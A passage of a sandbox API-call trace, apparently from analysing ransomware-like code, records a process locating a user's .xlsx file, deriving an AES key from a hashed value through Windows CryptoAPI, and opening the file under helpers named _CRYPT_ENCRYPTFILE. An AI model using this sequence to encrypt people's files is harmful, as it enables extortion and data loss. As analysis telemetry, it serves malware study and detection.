lpString1="lkgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kgYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gYER.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.023] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.023] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0169.023] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0169.023] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0169.023] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.023] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.023] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.023] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0169.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862f1b80, ftCreationTime.dwHighDateTime=0x1d57779, ftLastAccessTime.dwLowDateTime=0x8cd8dec0, ftLastAccessTime.dwHighDateTime=0x1d57a90, ftLastWriteTime.dwLowDateTime=0x8cd8dec0, ftLastWriteTime.dwHighDateTime=0x1d57a90, nFileSizeHigh=0x0, nFileSizeLow=0x138f3, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="F8kGUIlkgYER.xlsx", cAlternateFileName="F8KGUI~1.XLS")) returned 0x90af58 [0169.024] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0169.024] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.024] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0169.024] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.024] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0169.024] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.024] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0169.024] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.024] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0169.024] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.024] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.024] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.024] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.025] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0169.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.025] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0169.026] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.026] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.026] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0169.026] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.026] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.026] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0169.027] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.027] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0169.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0169.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.027] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0169.027] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.027] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.027] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0169.027] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0169.027] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0169.035] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.035] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0169.035] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0169.035] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0169.035] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0169.035] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.035] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.035] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.035] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0169.035] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.035] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0169.035] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.035] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.035] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.036] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.036] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.036] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0169.036] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.036] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.037] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0169.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.037] CryptDestroyHash (hHash=0x90ae18) returned 1 [0169.037] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8kguilkgyer.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0169.037] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.037] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0169.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0169.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0169.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0169.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0169.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0169.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0169.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0169.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0169.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0169.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0169.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0169.040] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0169.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0169.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0169.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 